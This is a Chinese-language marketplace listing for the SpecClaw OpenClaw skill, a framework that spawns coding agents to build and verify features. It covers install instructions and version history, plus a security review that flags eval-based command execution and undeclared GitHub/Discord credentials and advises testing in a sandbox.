← 返回 Skills 市场
SpecClaw
作者
chanbistec
· GitHub ↗
· v0.6.1
· MIT-0
122
总下载
0
收藏
0
当前安装
7
版本数
在 OpenClaw 中安装
/install specclaw
功能描述
Spec-driven development framework for OpenClaw. Propose features, generate specs, spawn coding agents, validate implementations.
安全使用建议
This skill is powerful and generally coherent with its purpose, but proceed with caution:
- Review config.yaml before using: the skill will run test/lint/build commands and may auto-commit/merge; ensure commands are safe and auto-merge behavior is acceptable.
- External integrations (GitHub issue sync, Discord notifications) are mentioned but no credentials are declared. Inspect gh-sync.sh and notification-related scripts to see which environment variables or auth methods they use; supply credentials only if you trust the code and repository.
- The skill spawns coding agents that receive file contents (up to 500 lines per file). If your repo contains sensitive secrets, consider cleaning or isolating the repository (or disabling automation) before running builds.
- There's a small path inconsistency in the docs: SKILL.md sometimes references bash skill/scripts/*. The actual scripts are in scripts/. Confirm paths used at runtime (OpenClaw may mount skill files under a different root) so commands invoked by the agent will work as intended.
- Test in a disposable or sandbox repository first. Disable automation/cron until you’ve validated behavior. If you need the GitHub/Discord features, audit the specific scripts (gh-sync.sh, notification code) to confirm what tokens they read and how they transmit data.
If you'd like, I can: (1) list the exact places where external tokens would be needed (search gh-sync.sh, notification code), (2) scan the bundled scripts for code that posts to external endpoints or reads environment variables like GITHUB_TOKEN, DISCORD_WEBHOOK, etc., or (3) summarize what config.yaml options control auto-merge and automation.
功能分析
Type: OpenClaw Skill
Name: specclaw
Version: 0.6.1
The specclaw skill bundle implements a complex spec-driven development framework that orchestrates sub-agents to automate code changes. It is classified as suspicious due to the use of 'eval' in 'scripts/build.sh' and 'scripts/verify.sh' to execute shell commands (test, lint, and build) defined in the 'config.yaml' file. This creates a significant Remote Code Execution (RCE) vulnerability if the configuration is manipulated. Additionally, 'scripts/gh-sync.sh' handles GitHub authentication tokens to interact with the GitHub API (api.github.com). While these capabilities are aligned with the stated purpose of a build and synchronization engine, the lack of input sanitization for executed commands represents a high-risk behavior without evidence of intentional malice.
能力评估
Purpose & Capability
The scripts and runtime instructions match the stated purpose: orchestrating propose→plan→build→verify workflows, spawning coding agents, creating worktrees/branches, and committing changes. This level of file/VC operations is expected for a spec-driven build orchestrator. Note: the SKILL.md mentions optional GitHub sync and notification integrations (Discord), but the registry metadata declares no required credentials or config paths for those services — a gap between claimed capabilities and declared requirements.
Instruction Scope
Runtime instructions read repository files, generate context payloads (build-context.sh collects listed files up to 500 lines each), create/modify files in .specclaw and the project, spawn coding subagents, run git operations (branch/worktree creation, commits, merges), and run configured test/lint/build commands. All of this is consistent with the skill goal, but it implies the agent will be given broad read/write access to the repo and may run arbitrary build/test commands. The SKILL.md also describes an autonomous 'cron' automation mode that will run builds on a schedule — this is powerful and should be enabled only with care.
Install Mechanism
There is no install spec (instruction-only). Scripts are bundled in the skill and invoked by the agent (via exec). No external downloads/installs are requested by the skill itself, which reduces install-time risk. The presence of many bundled scripts is expected for an orchestrator.
Credentials
The skill declares no required environment variables or primary credential, yet the SKILL.md and templates reference optional GitHub sync (creating/updating Issues) and external notifications (e.g., Discord channels). Those integrations normally require tokens or credentials (GH PAT, Discord webhook/bot token) but none are declared in requires.env. That mismatch could mean the skill expects credentials to exist elsewhere (git remotes/SSH, local environment), or that gh-sync.sh / notification scripts will read undeclared env vars at runtime — both are notable. Also, the skill emits commands that will run your project's test/lint/build commands (configurable in config.yaml) which may require network access or credentials not surfaced by the skill metadata.
Persistence & Privilege
The skill does not request 'always: true' and is user-invocable. However it can spawn agents autonomously (default platform behavior) and SKILL.md documents an automation/cron mode that will run builds on its own schedule. Combined with the skill's ability to create branches/worktrees and commit/merge changes, this grants meaningful persistent capabilities over the repository when enabled. There is no sign it tries to modify other skills' configs.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install specclaw - 安装完成后,直接呼叫该 Skill 的名称或使用
/specclaw触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v0.6.1
Fix: gh-sync auth fallback (invalid token falls back to gh CLI). Fix: validate-change.sh enforces GitHub issue creation when github.sync is enabled.
v0.6.0
Phase validation guards: enforce propose→plan→build→verify→archive prerequisites. Configurable strict mode (workflow.strict). Change status inspector.
v0.5.0
Git worktrees: worktree-per-change strategy for parallel multi-change builds. Verification engine: evidence collection, agent-powered spec validation, structured reports.
v0.4.0
Verification engine: evidence collection, verify agent spawning, structured pass/fail reports, auto-verify after build, remediation suggestions. Also: gh-sync task checklist fix.
v0.3.0
GitHub Issues sync: one issue per change with task checklist, dual gh CLI + curl support, auto-sync across propose/plan/build/verify/archive
v0.2.0
Self-improvement features: build error journal with retry context, specclaw learn command, post-build review with scope deviation detection, cross-change pattern detection with auto-promotion
v0.1.0
Initial release: spec-driven development framework with build engine, wave-based parallel agent orchestration, git integration, task parsing, and status tracking
元数据
常见问题
SpecClaw 是什么?
Spec-driven development framework for OpenClaw. Propose features, generate specs, spawn coding agents, validate implementations. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 122 次。
如何安装 SpecClaw?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install specclaw」即可一键安装,无需额外配置。
SpecClaw 是免费的吗?
是的,SpecClaw 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。
SpecClaw 支持哪些平台?
SpecClaw 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 SpecClaw?
由 chanbistec(@chanbistec)开发并维护,当前版本 v0.6.1。
推荐 Skills